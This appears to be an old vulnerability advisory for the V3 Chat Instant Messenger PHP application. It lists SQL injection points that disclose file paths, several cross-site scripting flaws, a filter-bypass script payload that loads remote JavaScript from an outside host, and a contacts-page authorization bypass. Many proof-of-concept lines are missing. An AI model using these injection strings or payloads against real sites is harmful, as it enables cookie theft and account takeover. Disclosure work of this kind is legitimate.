V3 Chat Instant Messenger
Affected files:
/mail/index.php
/mail/reply.php
is_online.php
online.php
profile.php
profileview.php
search.php
mycontacts.php
expire.php
Mail Vulnerabilities:
Full path disclosure via SQL injection on id when reading mail:
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/v3chat/mail/index.php on line 17
XSS vuln with cookie disclosure:
We can bypass V3chats filters by using malformed img tags around out script tags. PoC:
Replying to mail XSS vulns:
Members online XSS vulns with cookie disclosure:
Same as above, on online.php:
SCRIPT>">
Adding members via Online.php Mysql error & full path disclosure:
http://www.example.com/messenger/online.php?action=update&membername='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/messenger/online.php on line 5
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Online', 'Jun 17, 2006 - 9:55 pm', '1150577732', '')' at line 1
Search.php XSS vuln:
Adding a member from search.php XSS vuln:
Same as above, this time on profile.php:
Same as above, on Profileview.php now:
XSS vuln with cookie disclosure when editing profile:
To bypass V3 chats filters we can use this XSS example. Credits to RSnake.Script tags wrapped around a document.write function that writes part of our second
script tag.
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://youfucktard.com/xss.js"></SCRIPT>
Mycontacts.php XSS vulns with user bypass.
It seems after you log in as a user youre able to put in any username in membername= and it will navigate you to their buddylist. From there you can add,
remove, chat with, etc people on their buddylist. etc.
PoC:
http://example.com/messenger/mycontacts.php?membername=putausername
Expire.php XSS vuln:
Screenshots:
http://www.youfucktard.com/xsp/v3chat1.jpg
http://www.youfucktard.com/xsp/v3chat2.jpg
http://www.youfucktard.com/xsp/v3chat3.jpg
http://www.youfucktard.com/xsp/v3chat4.jpg
http://www.youfucktard.com/xsp/v3chat5.jpg
http://www.youfucktard.com/xsp/v3chat6.jpg
http://www.youfucktard.com/xsp/v3chat7.jpg
http://www.youfucktard.com/xsp/v3chat8.jpg
http://www.youfucktard.com/xsp/v3chat9.jpg
http://www.youfucktard.com/xsp/v3chat10.jpg